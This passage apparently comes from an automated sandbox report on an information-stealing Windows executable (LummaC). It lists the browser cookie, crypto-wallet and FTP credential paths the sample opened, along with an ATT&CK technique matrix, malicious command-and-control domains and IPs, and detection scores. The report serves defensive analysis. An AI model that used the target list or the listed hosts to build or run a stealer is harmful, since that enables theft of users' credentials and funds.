              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
              Source: C:\Users\user\Desktop\X2hna87N3Y.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
              Source: Yara matchFile source: Process Memory Space: X2hna87N3Y.exe PID: 7536, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: Process Memory Space: X2hna87N3Y.exe PID: 7536, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation
              1
              DLL Side-Loading
              211
              Process Injection
              11
              Virtualization/Sandbox Evasion
              2
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              21
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell
              Boot or Logon Initialization Scripts1
              DLL Side-Loading
              211
              Process Injection
              LSASS Memory1
              Query Registry
              Remote Desktop Protocol41
              Data from Local System
              2
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Deobfuscate/Decode Files or Information
              Security Account Manager141
              Security Software Discovery
              SMB/Windows Admin Shares2
              Clipboard Data
              113
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
              Obfuscated Files or Information
              NTDS11
              Virtualization/Sandbox Evasion
              Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Software Packing
              LSA Secrets1
              Process Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain Credentials11
              File and Directory Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync33
              System Information Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              X2hna87N3Y.exe53%VirustotalBrowse
              X2hna87N3Y.exe50%ReversingLabsWin32.Exploit.LummaC
              X2hna87N3Y.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://tacitglibbr.biz/api5pnX100%Avira URL Cloudmalware
              https://tacitglibbr.biz/$100%Avira URL Cloudmalware
              https://tacitglibbr.biz/apiGy100%Avira URL Cloudmalware
              NameIPActiveMaliciousAntivirus DetectionReputation
              tacitglibbr.biz
              104.21.50.161
              truefalse
                high
                NameMaliciousAntivirus DetectionReputation
                sordid-snaked.cyoufalse
                  high
                  awake-weaves.cyoufalse
                    high
                    immureprech.bizfalse
                      high
                      https://tacitglibbr.biz/apifalse
                        high
                        deafeninggeh.bizfalse
                          high
                          tacitglibbr.bizfalse
                            high
                            debonairnukk.xyzfalse
                              high
                              diffuculttan.xyzfalse
                                high
                                effecterectz.xyzfalse
                                  high
                                  wrathful-jammy.cyoufalse
                                    high
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://duckduckgo.com/chrome_newtabX2hna87N3Y.exe, 00000002.00000003.1790862040.0000000003849000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1790714563.000000000385F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://tacitglibbr.biz/X2hna87N3Y.exe, 00000002.00000003.1967520057.0000000003843000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1967608175.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1898523621.0000000003843000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000002.1968906269.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1861640861.0000000003842000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1837473248.0000000003841000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1838884443.0000000003843000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1865958853.0000000003843000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1908365458.0000000003843000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1861061599.0000000003841000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1923244085.0000000003843000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1837946467.0000000003843000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1860626926.0000000003841000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1839293002.0000000003843000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1836962329.0000000003841000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1910866448.0000000003843000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://duckduckgo.com/ac/?q=X2hna87N3Y.exe, 00000002.00000003.1790862040.0000000003849000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1790714563.000000000385F000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgX2hna87N3Y.exe, 00000002.00000003.1839293002.000000000383A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoX2hna87N3Y.exe, 00000002.00000003.1790862040.0000000003849000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1790714563.000000000385F000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://tacitglibbr.biz/api5pnXX2hna87N3Y.exe, 00000002.00000003.1899145307.0000000003848000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              unknown
                                              https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.X2hna87N3Y.exe, 00000002.00000003.1839293002.000000000383A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=X2hna87N3Y.exe, 00000002.00000003.1790862040.0000000003849000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1790714563.000000000385F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://crl.rootca1.amazontrust.com/rootca1.crl0X2hna87N3Y.exe, 00000002.00000003.1837741208.000000000386E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaX2hna87N3Y.exe, 00000002.00000003.1839293002.000000000383A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=X2hna87N3Y.exe, 00000002.00000003.1790862040.0000000003849000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1790714563.000000000385F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://tacitglibbr.biz/apiGyX2hna87N3Y.exe, 00000002.00000003.1967520057.0000000003848000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000002.1969538530.0000000003848000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1923244085.0000000003843000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        http://ocsp.rootca1.amazontrust.com0:X2hna87N3Y.exe, 00000002.00000003.1837741208.000000000386E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016X2hna87N3Y.exe, 00000002.00000003.1815799189.0000000003885000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1791495698.0000000003885000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1791387786.0000000003885000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1791313972.000000000388C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17X2hna87N3Y.exe, 00000002.00000003.1815799189.0000000003885000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1791495698.0000000003885000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1791387786.0000000003885000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1791313972.000000000388C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://www.ecosia.org/newtab/X2hna87N3Y.exe, 00000002.00000003.1790862040.0000000003849000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1790714563.000000000385F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brX2hna87N3Y.exe, 00000002.00000003.1838918603.000000000395C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://tacitglibbr.biz/$X2hna87N3Y.exe, 00000002.00000003.1898523621.0000000003843000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1908365458.0000000003843000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1923244085.0000000003843000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1910866448.0000000003843000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  https://ac.ecosia.org/autocomplete?q=X2hna87N3Y.exe, 00000002.00000003.1790862040.0000000003849000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1790714563.000000000385F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgX2hna87N3Y.exe, 00000002.00000003.1839293002.000000000383A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYiX2hna87N3Y.exe, 00000002.00000003.1839293002.000000000383A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://x1.c.lencr.org/0X2hna87N3Y.exe, 00000002.00000003.1837741208.000000000386E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://x1.i.lencr.org/0X2hna87N3Y.exe, 00000002.00000003.1837741208.000000000386E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallX2hna87N3Y.exe, 00000002.00000003.1791387786.0000000003860000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchX2hna87N3Y.exe, 00000002.00000003.1790862040.0000000003849000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1790714563.000000000385F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://support.microsofX2hna87N3Y.exe, 00000002.00000003.1791313972.000000000388E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://crt.rootca1.amazontrust.com/rootca1.cer0?X2hna87N3Y.exe, 00000002.00000003.1837741208.000000000386E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesX2hna87N3Y.exe, 00000002.00000003.1791387786.0000000003860000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://support.mozilla.org/products/firefoxgro.allX2hna87N3Y.exe, 00000002.00000003.1838918603.000000000395C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=X2hna87N3Y.exe, 00000002.00000003.1790862040.0000000003849000.00000004.00000800.00020000.00000000.sdmp, X2hna87N3Y.exe, 00000002.00000003.1790714563.000000000385F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94X2hna87N3Y.exe, 00000002.00000003.1839293002.000000000383A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            • No. of IPs < 25%
                                                                                            • 25% < No. of IPs < 50%
                                                                                            • 50% < No. of IPs < 75%
                                                                                            • 75% < No. of IPs
                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                            104.21.50.161
                                                                                            tacitglibbr.bizUnited States
                                                                                            13335CLOUDFLARENETUSfalse
                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                            Analysis ID:1576576
                                                                                            Start date and time:2024-12-17 09:43:46 +01:00
                                                                                            Joe Sandbox product:CloudBasic
                                                                                            Overall analysis duration:0h 4m 22s
                                                                                            Hypervisor based Inspection enabled:false
                                                                                            Report type:full
                                                                                            Cookbook file name:default.jbs
                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                            Number of analysed new started processes analysed:6
                                                                                            Number of new started drivers analysed:0
                                                                                            Number of existing processes analysed:0
                                                                                            Number of existing drivers analysed:0
                                                                                            Number of injected processes analysed:0
                                                                                            Technologies:
                                                                                            • HCA enabled
                                                                                            • EGA enabled
                                                                                            • AMSI enabled
                                                                                            Analysis Mode:default
                                                                                            Analysis stop reason:Timeout
                                                                                            Sample name:X2hna87N3Y.exe
                                                                                            renamed because original name is a hash value
                                                                                            Original Sample Name:443f4cf9f362a96bbd0845ba6d2859f0.exe
                                                                                            Detection:MAL
                                                                                            Classification:mal100.troj.spyw.evad.winEXE@4/0@1/1
                                                                                            EGA Information:
                                                                                            • Successful, ratio: 100%
                                                                                            HCA Information:
                                                                                            • Successful, ratio: 96%
                                                                                            • Number of executed functions: 41
                                                                                            • Number of non-executed functions: 141
                                                                                            Cookbook Comments:
                                                                                            • Found application associated with file extension: .exe
                                                                                            • Stop behavior analysis, all processes terminated
                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                            • Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.63
                                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                            TimeTypeDescription
                                                                                            03:44:46API Interceptor8x Sleep call for process: X2hna87N3Y.exe modified
                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            104.21.50.161wf1Ps82LYF.exeGet hashmaliciousLummaCBrowse
                                                                                              NYMPo215Qd.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                qvkwOs4JfC.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                      4TPPuMwzSA.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                        hiip7UoiAq.exeGet hashmaliciousLummaCBrowse
                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
